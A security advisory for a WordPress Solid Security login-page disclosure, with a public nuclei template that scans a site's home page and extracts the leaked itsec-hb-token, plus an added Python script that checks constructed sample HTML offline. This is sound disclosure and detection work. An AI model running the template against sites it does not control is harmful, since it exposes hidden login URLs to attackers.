WordPress Solid Security (formerly iThemes Security/Better WP Security) plugin before 9.0.1 is vulnerable to login page disclosure. When the Hide Backend feature is enabled and comments require user registration, the secret login URL token is exposed in the HTML source via the itsec-hb-token parameter in the comment form login links. Any unauthenticated visitor who reads the page source can therefore recover the hidden login URL, which defeats the purpose of the Hide Backend feature.
PoC code [public]
id: wp-better-wp-security-login-disclosure

info:
  name: WordPress Solid Security < 9.0.1 - Unauthenticated Login Page Disclosure
  author: 0x_Akoko
  severity: medium
  description: |
    WordPress Solid Security (formerly iThemes Security/Better WP Security) plugin before 9.0.1 is vulnerable to login page disclosure. When the Hide Backend feature is enabled and comments require user registration, the secret login URL token is exposed in the HTML source via the itsec-hb-token parameter in the comment form login links.
  reference:
    - https://wordpress.org/plugins/better-wp-security/
    - https://wpscan.com/vulnerability/b7201fc1-d825-484f-aca9-ba14a968179b/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
  tags: wordpress,wp-plugin,wp,exposure,ithemes,solid-security

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "itsec-hb-token=")'
        condition: and

    extractors:
      - type: regex
        name: secret-login-slug
        part: body
        group: 1
        regex:
          - 'itsec-hb-token=([a-zA-Z0-9_-]+)'
# digest: 4a0a0047304502202c7c3c59545198c77c7a035c12926661b5c9e6d527e942d6107ecb7b6fef277c0221009d8fc72aa522bdd2f4c581728ee933e01c1b93d3bd41aa6bfe288639f4878105:922c64590222798bb761d5b6d8e72950
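The nuclei template above matches on the raw substring `itsec-hb-token=` anywhere in the response body and pulls the token out with a regex. The following Python script is an added example, not part of the page or the nuclei template, that does the same check offline against a constructed HTML sample and is slightly stricter: it only accepts tokens that appear in the query string of an anchor `href`, which is where the comment form login links put them. The sample HTML, the hostname example.com and the token value are constructed for the demonstration. The two candidate login URLs it derives are assumptions about how the Hide Backend slug is used (`wp-login.php?itsec-hb-token=<token>` mirrors the leaked link; `/<token>` assumes the token equals the hidden login slug, as the template's extractor name `secret-login-slug` suggests), so treat them as leads to confirm manually rather than as guaranteed behaviour.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Same character class the nuclei extractor uses for the token.
TOKEN_RE = re.compile(r"^[A-Za-z0-9_-]+$")

# Constructed sample: a WordPress comment form rendered while
# "Users must be registered and logged in to comment" is on, with the
# Hide Backend token appended to the login link (the leak this page describes).
SAMPLE_BODY = """<!DOCTYPE html><html><body>
<p class="must-log-in">You must be
<a href="https://example.com/wp-login.php?redirect_to=https%3A%2F%2Fexample.com%2Fhello-world%2F&amp;itsec-hb-token=s3cr3t-slug">logged in</a>
to post a comment.</p>
<a href="https://example.com/feed/">RSS</a>
</body></html>"""

# Constructed sample of a page that does not leak anything.
CLEAN_BODY = """<html><body><p>Comments are closed.</p></body></html>"""


class _HrefCollector(HTMLParser):
    """Collects every href attribute of <a> tags; HTMLParser unescapes &amp; for us."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value:
                self.hrefs.append(value)


def extract_hb_tokens(body):
    """Return the distinct itsec-hb-token values found in anchor query strings."""
    parser = _HrefCollector()
    parser.feed(body)
    tokens = []
    for href in parser.hrefs:
        query = parse_qs(urlsplit(href).query)
        for token in query.get("itsec-hb-token", []):
            if TOKEN_RE.match(token) and token not in tokens:
                tokens.append(token)
    return tokens


def is_affected(status_code, body):
    """Mirror the template's matcher: a 200 response whose body leaks a token."""
    return status_code == 200 and bool(extract_hb_tokens(body))


def hidden_login_urls(base_url, token):
    """Candidate login URLs to verify by hand (assumption: token == hidden slug)."""
    base = base_url.rstrip("/")
    return [
        f"{base}/wp-login.php?itsec-hb-token={token}",
        f"{base}/{token}",
    ]


if __name__ == "__main__":
    for label, body in (("leaking page", SAMPLE_BODY), ("clean page", CLEAN_BODY)):
        print(f"{label}: affected={is_affected(200, body)}")
        for token in extract_hb_tokens(body):
            print("  token:", token)
            for url in hidden_login_urls("https://example.com/", token):
                print("  try:", url)
```

Because the nuclei matcher only checks for the substring, a page that mentions `itsec-hb-token=` in visible text (a blog post about this very issue, for instance) would also trip it; restricting the check to anchor query strings, as above, avoids that false positive while still catching the comment form links the advisory describes.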